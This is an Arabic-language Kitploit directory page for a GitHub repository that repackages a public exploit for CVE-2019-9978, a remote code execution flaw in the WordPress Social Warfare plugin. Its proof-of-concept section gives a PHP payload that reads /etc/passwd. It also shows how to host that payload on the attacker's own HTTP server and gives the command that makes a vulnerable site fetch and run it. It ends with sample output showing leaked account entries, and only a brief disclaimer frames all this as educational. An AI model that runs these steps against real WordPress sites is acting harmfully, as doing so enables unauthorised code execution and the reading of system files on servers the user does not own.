Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-9978 — ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في إضافة Social Warfare لنظام WordPress، تؤثر على الإصدارات الأقدم من 3.5.3. | Kitploit
أدوات/GitHubGitHub/echoosso/cve-2019-9978
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubechoosso/cve-2019-9978

CVE-2019-9978

ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في إضافة Social Warfare لنظام WordPress، تؤثر على الإصدارات الأقدم من 3.5.3.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9978 - ثغرة تنفيذ الأوامر عن بعد في إضافة Social Warfare لووردبريس < 3.5.3

ثغرة تنفيذ أوامر عن بعد (RCE) في إضافة Social Warfare لووردبريس، تؤثر على جميع الإصدارات الأقل من 3.5.3.


💡 الدافع

كان الاستغلال العام الأصلي مكتوبًا بإصدار قديم من بايثون ولم يعد يعمل بشكل صحيح في البيئات الحديثة.
أعدت كتابة الاستغلال ليكون متوافقًا تمامًا مع Python 3، مما يجعله أسهل في الاستخدام والفهم والتكامل مع الأدوات الحديثة.


إثبات المفهوم (PoC)

✅ الخطوة 1 – إنشاء الحمولة

أنشئ ملفًا باسم payload.txt بالمحتوى التالي:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ الخطوة 2 – تشغيل خادم HTTP ببايثون

استخدم بايثون لخدمة حمولتك:

root@kitploit:~
python3 -m http.server 8000

هذا سيجعل ملف payload.txt متاحًا على:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ الخطوة 3 – تشغيل الاستغلال

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

المخرجات المتوقعة

إذا كان الهدف ضعيفًا، فستتلقى مخرجات مشابهة لـ:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

لقطات الشاشة

خادم HTTP يتلقى طلبًا

http-server

تنفيذ الاستغلال بنجاح

exploit

محتوى ملف الحمولة

payload


🧬 إذا جعلتك هذه الحمولة سعيدًا، فإن نجمة ⭐ ستسعدني.

التفاصيل التقنية

  • الإضافة: Social Warfare
  • الإصدارات المتأثرة: < 3.5.3
  • CVE: CVE-2019-9978
  • نوع الثغرة: تنفيذ أوامر عن بعد (RCE)
  • المؤلف الأصلي: @hash3liZer
  • الباحث: Luka Sikic

الإسناد

  • مؤلف الاستغلال: @hash3liZer
  • إعادة العمل لبايثون 3: @echosso

⚠️ إخلاء مسؤولية: هذا المستودع مخصص للأغراض التعليمية والاختبار الأخلاقي فقط.
الاستخدام غير المصرح به لهذا الاستغلال ضد أنظمة لا تملكها ممنوع منعًا باتًا.

تنزيل الأداة